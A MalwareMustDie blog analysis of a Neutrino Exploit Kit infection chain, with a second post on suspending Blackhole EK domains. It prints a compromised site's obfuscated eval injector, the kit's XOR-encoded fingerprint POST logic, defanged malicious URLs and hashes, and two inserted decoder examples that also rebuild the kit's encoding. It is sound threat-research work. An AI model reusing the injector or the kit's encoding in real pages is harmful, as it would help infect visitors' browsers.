
Knockin' on Neutrino Exploit Kit's door.. Part-1 (where is "that" PluginDetect 0.8.0 ??)


Summary of infection chains

This is going to be a long write-up, but the weekdays have started, and so has the daily work, which comes first under the #MalwareMustDie NPO rules, so please allow me to split this post into two parts; this is the important part..

Found this EK in the progress of an infection; the URI reference, landing page & malicious obfuscation code used show Neutrino Exploit Kit traces, but there are slight changes here and there compared to previous findings posted by fellow researchers, so maybe it's a different or newer variant.

By the time I spotted this, it was a fresh, growing threat and had started to build infection chains. I can't just sit and watch, nor just play with it, so as a quick act to stop this (which is a must) I dared myself to make a malicious-verdict post for shutdown reference purposes. Please help to push this threat's shutdown ASAP, don't wait for the research's pace (with thanks in advance).

First, let's get straight to the summary of the infection as per the table below.
PS: Believe me that all of the information below is worth blocking, and NO! this is never a good/legit mechanism, it must be a malicious scheme, so don't waste your time wondering, grab the sample we grabbed as per attached and see it yourself (quicker).

EK Function           IP Address       URL
Redirector            74.53.108.147    h00p://www.webapps4hotels.com/?wps=2
TDS/Clicker           81.88.48.79      h00p://bizkaikopirenaika.com/clicker.php
Landing Page          178.17.169.199   h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
PluginDetect File     178.17.169.199   h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js
Payload/Infector URL  178.17.169.199   h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371

Neutrino EK is up on 178.17.169.199 in Moldova, Europe and serves multiple random infector domains as per below (we are requesting the shutdown of these malicious acts at this moment), which are partially based on shared dynamic DNS services:

1. xxx.dnsdojo.com

mlviwwiokblfqj.dnsdojo.com
mocqrrrnqxeuyejthn.dnsdojo.com
hdpbdwndymbtrsvxship.dnsdojo.net
youbljtwmqfpggrest.dnsdojo.net
pxwkcdewyrqu.dnsdojo.net
kmevvwtioxwu.dnsdojo.net
:
2. xxx.selfip.biz
ilustyewwwiec.selfip.biz
pporvwwsrqfwqdiiqvj.selfip.biz
ifwutmgywlrno.selfip.biz
hxlswcwsyodq.selfip.biz
mqydnjycdjmpdqhs.selfip.biz
wqkcrphwlxv.selfip.biz
fwklleuqdogcmhxtirw.selfip.biz
:
3. xxx.worse-than.tv
45400f3233e52d15694cf990.worse-than.tv
26745522c585519482f0e3e3.worse-than.tv
d22a34203ed4dc4571e361de.worse-than.tv
:
4. xxx.does-it.net
brmvcfvtplecyqryixyv.does-it.net
plmomkgpxxej.does-it.net
:

While the TDS service used is on IP 81.88.48.79 in Italy, which is also a shared dynamic DNS domain/service as per below:

onlinux-es.setupdns.net
which involves a huge number of possible domains as malware infectors; the list is -->>[HERE]

Additionally, the redirector used shared domains spotted on IP 74.53.108.147 in Houston, Texas, of ISP/domain theplanet.com:

acaville.com.pe
fridgeadvisor.com
thetreadmilladvisor.com
webapps4hotels.com
:


Neutrino EK's Landing / Infection Analysis

It started from the redirection URL, via spam leading to the redirector URL.
In the browser it looks like this:

The download log..

--2013-06-24 19:00:11--  h00p://www.webapps4hotels.com/?wps=2
Resolving www.webapps4hotels.com... seconds 0.00, 74.53.108.147
Caching www.webapps4hotels.com => 74.53.108.147
Connecting to www.webapps4hotels.com|74.53.108.147|:80... seconds 0.00, connected.
:"
GET /?wps=2 HTTP/1.0
Host: www.webapps4hotels.com
HTTP request sent, awaiting response...
":
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2013 10:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: h00p://www.webapps4hotels.com/xmlrpc.php
Set-Cookie: PHPSESSID=79a8dc9b2b759b5e987a266ce9991b74; path=/
Set-Cookie: nosqueeze=nosqueeze; expires=Mon, 17-Jun-2013 10:00:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
:
Length: unspecified [text/html]
Saving to: `index.html'
2013-06-24 19:00:13 (109 KB/s) - `index.html' saved [56700]
You'll see the malicious code right away, as per the snipped jinxed code:
<body class="home blog single-author two-column right-sidebar">


<script type="text/javascript" language="javascript" >

bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;
ff=String.fromCharCode;z="dy";try{document["bo"+z]++}catch(d21vd12
v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval
"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,1
[...]
1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];
for(i=2-2;-i+1314!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]
))+0xa-bv);}za=e;za(s)}</script><div id="page" class="hfeed">
<header id="branding" role="banner">
The code explains as follows..

these variables are the key to rotate the values...

 sp="spli"+"t";
w=window;
ff=String.fromCharCode;
z="dy";

..and then it writes the body...

 try
{
document["bo"+z]++
}

..and after it runs, the eval is burped...

   try
{
document;
}
catch(wb)
{
vzs=2;
}
if(!vzs)e=w["eval"];
:
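To show what that loop actually does, here is an added example (my own code, not the injected script and not MMD's tooling) that decodes the hex list statically, without eval: it re-implements the `ff(e(aq+(w[j]))+0xa-bv)` step as a plain hex parse plus the offset 0xa-bv = 9, and pulls `bv`, the `f` list and the loop bound out of a wrapper of this shape. The only real data in it are the head and tail of the `f` string visible above; `SAMPLE_SCRIPT` is a constructed miniature of the wrapper built from those head tokens, and the regex shapes it assumes are mine.

```javascript
// Added example (not the landing-page code quoted above, nor MMD's own tooling):
// decode the first-stage layer statically instead of letting eval() run it.
// The page's wrapper does, for every comma-separated hex token w[j]:
//     s += String.fromCharCode(eval("0x" + w[j]) + 0xa - bv)     with bv = (5-3-1) = 1
// so each character is stored as (charCode - 9) in hex, and the guard (0x19==031)
// is simply 25 == 25 (031 is an octal literal), i.e. always true in non-strict JS.

// Head and tail of the "f" string exactly as visible on the page; the middle was elided there.
const HEAD = '17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20';
const TAIL = '1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1';

// Constructed miniature of the wrapper: same shape as the page's script, but with only
// the 18 visible HEAD tokens and a matching loop bound, so the extractor can be exercised.
const SAMPLE_SCRIPT =
  'bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String.fromCharCode;z="dy";' +
  'try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}' +
  'if(!vzs)e=w["eval"];if(1){f="' + HEAD + '"[sp](",");}w=f;s=[];' +
  'for(i=2-2;-i+18!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}';

// Decode a comma-separated hex list with the page's offset; no eval involved.
function decodeStage1(hexList, bv = 5 - 3 - 1) {
  const offset = 0xa - bv;
  return hexList.split(',').map((tok) => {
    if (!/^[0-9a-f]+$/i.test(tok)) throw new Error('unexpected token ' + JSON.stringify(tok));
    return String.fromCharCode(parseInt(tok, 16) + offset);
  }).join('');
}

// Pull bv, the hex list and the loop bound out of a wrapper of this shape and decode it.
// Assumption: bv is written as (x-y-z) and the loop as -i+N!=0, as in the sample above.
function decodeFromScript(src) {
  const bvM = /bv=\((\d+)-(\d+)-(\d+)\)/.exec(src);
  const fM = /f="([0-9a-f,]+)"\[sp\]\(","\)/i.exec(src);
  const nM = /-i\+(\d+)!=0/.exec(src);
  if (!bvM || !fM || !nM) throw new Error('wrapper does not match the expected shape');
  const bv = Number(bvM[1]) - Number(bvM[2]) - Number(bvM[3]);
  const tokens = fM[1].split(',');
  const n = Number(nM[1]);
  // The loop bound is the number of tokens the script expects; a mismatch means a mangled sample.
  if (tokens.length !== n) throw new Error('loop bound ' + n + ' != ' + tokens.length + ' tokens');
  return decodeStage1(fM[1], bv);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(decodeStage1(HEAD)));          // " function zzzfff()"
  console.log(JSON.stringify(decodeStage1(TAIL)));          // "\nzzzfff();\r\n}\r\n}\r\n"
  console.log(JSON.stringify(decodeFromScript(SAMPLE_SCRIPT)));
}
```

The visible head already decodes to the start of a function declaration and the tail to its closing braces, which is consistent with the second stage being a plain script that the `za(s)` call then evaluates; the loop bound (1314 in the real sample) doubles as a sanity check that a captured copy was not truncated.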

The burped eval value is the hidden IFRAMER with the specific cookie condition:

This is why I got the TDS URL, which I checked as follows:

// TDS trolls...

--2013-06-24 19:31:14-- "h00p://bizkaikopirenaika.com/clicker.php"
Resolving bizkaikopirenaika.com... seconds 0.00, 81.88.48.79
Caching bizkaikopirenaika.com => 81.88.48.79
Connecting to bizkaikopirenaika.com|81.88.48.79|:80... seconds 0.00, connected.
:"
GET /clicker.php HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
Host: bizkaikopirenaika.com
HTTP request sent, awaiting response...
":"
HTTP/1.1 302 Found"
Date: Mon, 24 Jun 2013 10:31:07 GMT
Server: Apache/2.2.14 (Unix)
X-Powered-By: PHP/5.2.5
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Content-Length: 0
Content-Type: text/html
Content-Language: es
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
:"
302 Found"
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371 [following]
Skipping 0 bytes of body: [] done.
--2013-06-24 19:31:18-- h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Resolving youbljtwmqfpggrest.dnsdojo.net... seconds 0.00, 178.17.169.199
Caching youbljtwmqfpggrest.dnsdojo.net => 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... seconds 0.00, connected.
:
GET /afscm?qomseteng=7559371 HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: youbljtwmqfpggrest.dnsdojo.net:8000
Connection: keep-alive
Keep-Alive: 300
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jun 2013 10:31:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.6
:
200 OK
Length: unspecified [text/html]
Saving to: `afscm@qomseteng=7559371'
2013-06-24 19:31:22 (34.0 MB/s) - `afscm@qomseteng=7559371' saved [2512]
Well, we got the 302 that threw us to the below URL; "the" landing page.
h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
It will download us the below codes:

If we beautify the JavaScript part, which is the core of this infection and the main verdict of the malicious act, you'll recognize it as part of the PluginDetect code to detect the plugins & other components of your browser, for the exploitation purpose:

For your reference, I beautified the full code of the landing page here -->>[MMD Pastebin]
As you can see in the code, different from the previous Neutrino EK landing codes, it doesn't plainly mention the "host-id" or "password" used, but now they hide it to be generated via the below logic:
 JSON.stringify=JSON.stringify||function(a)
{
var c=typeof a;
if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);
var d,b,e=[],f=a&&a.constructor==Array;
for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
return(f?"[":"{")+String(e)+(f?"]":"}")};

Back to the downloaded code (the Neutrino EK's landing page): it has so many links to .js and .css files, don't waste your time on this garbage, yes I checked them all, i.e. the .js files are below:

// below are the .js files..
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
...yup, to be sure I downloaded them all..
--2013-06-24 19:46:20--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/.js
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/javascript]
Saving to: `wgyesrof.js'
2013-06-24 19:46:23 (923 KB/s) - `wgyesrof.js' saved [118]
Saving to: `vuofg.js'
2013-06-24 19:46:51 (6.50 MB/s) - `vuofg.js' saved [181]
Saving to: `cqqv.js'
2013-06-24 19:47:06 (5.96 MB/s) - `cqqv.js' saved [178]
Saving to: `cnvpce.js'
2013-06-24 19:47:23 (866 KB/s) - `cnvpce.js' saved [29]
Saving to: `aqrwwpb.js'
2013-06-24 19:47:41 (677 KB/s) - `aqrwwpb.js' saved [24]
Saving to: `hptkkoyqvzt.js'
2013-06-24 19:47:58 (4.85 MB/s) - `hptkkoyqvzt.js' saved [182]
Saving to: `ppkuryqha.js'
2013-06-24 19:49:07 (1.83 MB/s) - `ppkuryqha.js' saved [107]
Saving to: `blgxhwyvdop.js'
2013-06-24 19:49:27 (360 KB/s) - `blgxhwyvdop.js' saved [10]
Saving to: `zenpzmilbxv.js'
2013-06-24 19:49:47 (4.85 MB/s) - `zenpzmilbxv.js' saved [135]
Saving to: `oumvvhkwsruznt.js'
2013-06-24 19:50:12 (154 KB/s) - `oumvvhkwsruznt.js' saved [21]
Saving to: `rhkggotwoffagc.js'
2013-06-24 19:50:32 (1.18 MB/s) - `rhkggotwoffagc.js' saved [37]
Containing crap strings...
// the list.. 
"
2013/06/24 19:47 24 aqrwwpb.js e56eb6406a2ad302e8960c79c27c638b
2013/06/24 19:49 10 blgxhwyvdop.js 3172a382e2d9f1af0ff4242a60b85bc8
2013/06/24 19:47 29 cnvpce.js d98c8323b16f548cf96efe38c5a18038
2013/06/24 19:47 178 cqqv.js 4a6813af85e9e4a06539b30a598d7054
2013/06/24 19:47 182 hptkkoyqvzt.js 60f725e731ca6431db8a309e35da2f1b
2013/06/24 19:50 21 oumvvhkwsruznt.js d1429317cea14fa84a9583474b1b0b03
2013/06/24 19:49 107 ppkuryqha.js b801f8e1dc5f7fb40acceea6c70fff2c
2013/06/24 19:50 37 rhkggotwoffagc.js 022488c0ad7f8f038173ba55130b03c7
2013/06/24 19:46 181 vuofg.js dfab72d0ed8c9b4cf56b7dccf2cb3484
2013/06/24 19:46 118 wgyesrof.js 0b6057183dcedf3d275d3dc6ee4131fa
2013/06/24 19:49 135 zenpzmilbxv.js 8a29661c15b5940a4744576b291d1078
"
// assemble the codes...to find you the garbage...
"
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
"
// cat & merge them all and result is here: 100% pure craps..

// wyczqnfpganiazbntkuycgxhytsxgyidwkcnyidfiqnjqpxkzsjcygjwacugacjxnmlmvordffmwukhucqxbxhyxjsejuohiasuvhmznsmjmwrhziea
// btkdpwixiezptqwfijjrukbbosnwrhosbywqveneintbdqhmzqeubfvpyjmprbiszeivjwarjutnkazjreetjzjhjvxawftwjcssyskindvxevhwzlpjlyqvtnwqspncrfvpygylkujoqqkpczzoypjsdgiwvvzmauczaakkutzkkjanja
// nzsdfulnbeahonomcixycuhxmwqtwxlkxendyzradsirfweifbhhwofilvchsnrqsftqekriczaiveqbfxicmolxjnecbwstbmkgwbozbohxsyyywhbivmffajhcgavhmgojicijrqhkofjknksixxnxhvznvvvibjrjmatdqaofgxq
// ggqkulbvalrssycymsyvfrkwjt
// xticyuzjlqnjbigpundax
// uapgllhhuyojyrzeaxhfbzwwtsgwwhoqhdxsoeajdosbgsggpomrniogbudxbrojumcjqdsurkwydcetrqlezzlaupywgngazjjqmckdmgcqjgjbxufxuryogxlnkrokayamalqmssdczmdxgjvabtpiqavbrjlshmehyvuroxunkxlqhgr
// voxtnlheexmejkkkjoffluwsvaaosrznfwhshpxmmjqvubgepljbggtbhuqzlpnrmukujihwsysmzzqplaqrgktoejoqzbilvsffamct
// hwouuqs
// igmeiwttqzebwsjihxodzsdoljcgbttjzgoichbthgueyemfcbjbunqgxsmylgilnwtpevjmberaiegkfqmzecgbvszgzhsmemcjilwkqnkyrrjwiwwmycntvnauuthzfkjo
// moqehjiffvtfkycywp
// oaqjntbakmsnnjuixihdcquslnvoidsxdi
It goes the same for all the .css files..
$ peek h00p://youbljtwmqfpggrest.dnsdojo.net:8000/rcijxziqjmwai.css
ejuzjwuujkemwakngquwbriiviazztb
$ peek h00p://youbljtwmqfpggrest.dnsdojo.net:8000/ubjabj.css
ylyvjo
$ peek h00p://youbljtwmqfpggrest.dnsdojo.net:8000/wqhbu.css
vhrmzrnkvxkvpnnjsrhegmuvxuipgv
:
$ peekl h00p://youbljtwmqfpggrest.dnsdojo.net:8000/pqnojry.css
sxsstxnzjbjt


The PluginDetect 0.8.0

According to the plugin detection code above in the landing page, there MUST BE! a PluginDetect somewhere. Eager to know which version they use, I checked and there is one more .JS worth checking; it is camouflaged under the /scripts/js/ directory. So let's fetch it:

--2013-06-24 20:02:06--  
"h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js"
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41616 (41K) [application/x-javascript]
Saving to: `plg.js'
2013-06-24 20:02:12 (42.4 KB/s) - `plg.js' saved [41616/41616]
Snippet is:
var PluginDetect={version:"0.8.0",name:"PluginDetect",openTag:...
RegExp(b):this.getNumRegx).exec(a):null;return c?c[0]:null},compar...
"0","0","0"]);for(c=0;4>c;c++)if(/^(0+)(.+)$/.test(d[c])&&(d[c]=Re...
this.$;return a.isIE&&7<=a.verIE?1:0},objectProperty:function(a){v...
!c.test(f))return d[e];return null},getMimeEnabledPlugin:function(...
if(!b||!b.getVersion)return c;c.plugin=b;this.isDefined(b.installe...
g&&f>g&&"0"!=d[f]||e[f]!=d[f]&&(-1==g&&(g=f),"0"!=d[f]))return b;r...
b,c=document,d=a.userAgent||"",e=a.vendor||"",f=a.platform||"",a=a....
c.getElementsByTagName("body")[0]||c.body||null;this.verIE=(this.i...
"")?5:b)||this.verIE;this.verIE=b||this.docModeIE}this.ActiveXEnab...
this.formatNum(RegExp.$1):null;this.verSafari=(this.isSafari=(/App...
this.isArray(a)&&0<a.length&&this.isFunc(a[0]))&&b.push(a)},callAr...
"0");1!=f.getVersionDone&&(f.getVersion(c,d,e),null===f.getVersion...
:
The beautified code I pasted here--->>[MMD Pastebin]

Below is the list of detections & the (malicious) weaponization possibilities of this PluginDetect:

"Quicktime
Java
Flash
Shockwave
Windows Media Player
Silver Light
VideoLAN VLC
Adobe Reader
Real Player
"
Meaning, exploitation of the above list of software is applicable.

The Neutrino EK's PluginDetect does not contain direct infection code; all of the infection code is related to the applet in its landing pages, so unlike Blackhole EK or Cool EK, it will be no surprise to find that Neutrino EK's PluginDetect script is undetected by virus scanning products:

URL: https://www.virustotal.com/en/file/4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1/analysis/
SHA256: 4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1
SHA1: 6c15ef7801f35733e89e8df0113866d8a09a5ba6
MD5: 13f62e2903683ec97a25885b05e8bed9
File size: 40.6 KB ( 41616 bytes )
File name: plg.js
File type: Text
Tags: text
Detection ratio: 0 / 47
Analysis date: 2013-06-24 16:19:36 UTC ( 10 hours, 39 minutes ago )


Malicious Exploit Kit Verdict

The supporting verdict to PoC this landing page as an EK's landing (Neutrino):

1. Attempt to xor and decode the URL:

$.post(d,f,function(a)
{$("body").append(xor(decodeURIComponent(a),c))
2. Neutrino EK's infector string building logic (to be used by the POST query later on):
 for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
return(f?"[":"{")+String(e)+(f?"]":"}")
3. The XOR logic itself..
function xor(a,c)
{ for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));
return d }
4. Below are the Java exploit infection traces via POST request recorded (still being checked, the target keeps changing too..):
Query:   POST /bxfkxhcqk HTTP/1.1
host: h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000
Referer: h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371
The query above was generated by the below logic/code in the landing page:
[...]
var f={};
f[b]=c;
f[e]=encodeURIComponent(xor(JSON.stringify(a),c));
$.post(d,f,function(a) {$("body").append(xor(decodeURIComponent(a),c))});
[...]
5. The camouflaged attempt to download PluginDetect 0.8.0
6. The attempt to hide the XOR key in vars aa, bb, cc
$(document).ready(function()
{ var aa = 'gvwuhd';
var bb = '';
var cc = aa;
bb = cc;
to be stored in the var bb in the function's parameter below:
\u0410\u041d602(
'51c81ff4aaa2cce42c1809bd',
bb,
'bxfkxhcqk', // <-- this string "params d" goes to the post.. MMD note.
'rruqytkegrvjt',
'eefazbuhfeekpb' );
to be further used in XOR related calls/functions as the "c" parameter:
function \u0410\u041d602(a,c,d,b,e)
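Putting items 1 to 6 together, here is an added example (not the kit's script as shipped, and not from the original post) that reproduces the landing page's `xor()` and `JSON.stringify` fallback from the snippets quoted above and wraps them so that a captured POST field, or a response body, can be decoded offline once the key literal (`bb`, 'gvwuhd' above) is known. `SAMPLE_FINGERPRINT` is a constructed stand-in for the object `a`; `buildPostField` and `decodeField` are my names for the two directions.

```javascript
// Added example, not the kit's script as shipped: the landing page's xor() and its
// JSON.stringify fallback are reproduced from the snippets quoted above, wrapped so a
// captured POST field or response body can be decoded offline once the key literal
// (the value copied into `bb`; 'gvwuhd' on this page) is known.

// Reproduced from the page: repeating-key XOR, key index e = b mod key length.
function xor(a, c) {
  for (var d = '', b = 0, e = 0; b < a.length; b++)
    e = Math.floor(b % c.length), d += String.fromCharCode(a.charCodeAt(b) ^ c.charCodeAt(e));
  return d;
}

// Reproduced from the page: the kit's own serializer (the JSON.stringify||function fallback,
// used on browsers without native JSON). Strings are quoted, nested objects recurse,
// arrays are detected via constructor == Array.
function kitStringify(a) {
  var c = typeof a;
  if ('object' != c || null === a) return 'string' == c && (a = '"' + a + '"'), String(a);
  var d, b, e = [], f = a && a.constructor == Array;
  for (d in a) b = a[d], c = typeof b, 'string' == c ? b = '"' + b + '"' : 'object' == c && null !== b && (b = kitStringify(b)), e.push((f ? '' : '"' + d + '":') + String(b));
  return (f ? '[' : '{') + String(e) + (f ? ']' : '}');
}

// What the landing page puts into the POST form field:
//   f[e] = encodeURIComponent(xor(JSON.stringify(a), c))
function buildPostField(fingerprint, key) {
  return encodeURIComponent(xor(kitStringify(fingerprint), key));
}

// The reverse, for a captured field, and also what the response handler does:
//   xor(decodeURIComponent(a), c)
function decodeField(encoded, key) {
  return xor(decodeURIComponent(encoded), key);
}

// Constructed stand-in for the plugin-fingerprint object `a` (the real one is filled from PluginDetect).
const SAMPLE_FINGERPRINT = { java: '1.7.0.21', flash: null, plugins: ['pdf', 'wmp'] };
const KEY = 'gvwuhd';  // the `aa`/`bb` literal quoted on the page

if (typeof require !== 'undefined' && require.main === module) {
  const wire = buildPostField(SAMPLE_FINGERPRINT, KEY);
  console.log(wire);                       // percent-encoded XOR'ed JSON, as seen in the POST body
  console.log(decodeField(wire, KEY));     // {"java":"1.7.0.21","flash":null,"plugins":["pdf","wmp"]}
}
```

Because XOR with a repeating key is its own inverse, the same `xor()` decodes both directions, which is why a single key literal in the page is enough to read the fingerprint the victim sends and the content the server returns; in a PCAP, the POST body field and the response body are the two inputs to `decodeField`.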

To be continued..
(plan: to break down the PluginDetect codes more, payload details, further infection spreading details..if the EK still exists later on..)



Additional

A couple of URLQuery results of this part of the story--->[1] and [2]
And the VirusTotal infection check result (pDNS) for the Exploit Kit's IP is here-->>[Virus Total]

Samples and PCAP data are shared for raising the detection ratio and research purposes only:

Download here--->>[MMD Dumps]

Reference

Our friend "Malware Forensic" (link) wrote good analyses on the previous version of Neutrino:
(click the number inside the brackets for links)
[-1-] Neutrino Exploit Kit landing page demystified
[-2-] Neutrino Exploit Kit Landing pane change or variation
[-3-] Neutrino Exploit Kit analysis

The great Exploit Kit researcher @kafeine (link) posted on Neutrino EK:
[-1-] Hello Neutrino ! (just one more Exploit Kit)
[-2-] CVE-2013-2423 integrating Exploit Kits (Neutrino EK Parts)
[-3-] His tweet on changes spotted in this Exploit Kit:


#MalwareMustDie!


Suspension announce of 61 unique domains used by Blackhole Exploit Kit ("closest" type) Crime Group operated on 80.78.247.114 (Russia)

MalwareMustDie, NPO, during its research activities, follows the process of suspending bad malware domains as an important milestone in the malware fighting steps. It is also publicly releasing some of the suspended domains in "Operation Tango Down" [What is TangoDown?] as a public announcement.

The current report is a fast and successful suspension process, thanks to good coordination between the members who spotted, analyzed & reported the threat, our PiCs in the Tango Team (thanks to @S with @CL for the hard work) and the related registrars, who helped us with GREAT cooperation for the swift follow-up and for banning further registrations (blacklist) accordingly. We have a much better pace in the suspension process (less than 18hrs), even right before the weekend, as a good lead-time reference for future cases.

Following is the report detail, with the note that it is not aiming for analysis details (we have a lot of similar case analyses in our blog already) but is more for cybercrime-evidence purposes, with all of the posted materials to be utilized for the following legal process.

Verdict of Crime

We detected the very dangerous exploit kit landing page of malware infection via browser vulnerability exploitation, pointed to the below IP/NETWORK:

"80.78.247.114 / AS43146 Agava Ltd.(Russia  Federation)"
Initially caught in the act using the Blackhole Exploit Kit "/closest/" version, operated under the below URLs:
"h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php
h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php
h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php
h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php
:"
Furthermore, the activity is also recorded in the VirusTotal pDNS report:
URL: https://www.virustotal.com/en/ip-address/80.78.247.114/information/
"2013-06-28 18:30:12 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php
2013-06-28 18:26:43 h00p://detectedflights.org/closest/
2013-06-27 21:33:13 h00p://terminalspervasive.biz/
2013-06-27 19:52:24 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262
2013-06-27 19:08:09 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 16:37:32 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 15:38:34 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php
2013-06-27 15:33:21 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php
2013-06-26 19:28:27 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php
2013-06-26 00:16:13 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php
2013-06-25 22:15:47 h00p://platformvillains.in/closest/hospital-worker.php
2013-06-25 21:40:54 h00p://platformvillains.in/
2013-06-25 21:40:35 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php
"
And also monitored in URLQuery:
URL: http://urlquery.net/search.php?q=80.78.247.114&type=string&start=2013-05-01&end=2013-06-29&max=400
"2013-06-28 21:20:51 1 /  0 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-28 16:05:21 0 / 0 h00p://detectedflights.org/closest/ [Russian Federation] 80.78.247.114
2013-06-28 11:20:30 1 / 0 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-28 11:19:03 1 / 0 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 23:33:26 0 / 2 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-27 23:15:52 1 / 0 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 21:49:41 0 / 2 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-27 20:40:27 2 / 13 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:43:31 2 / 6 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:39:28 2 / 21 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 19:26:24 2 / 15 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 18:49:18 2 / 14 h00p://datapadsinspecifically.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 15:10:13 2 / 11 h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
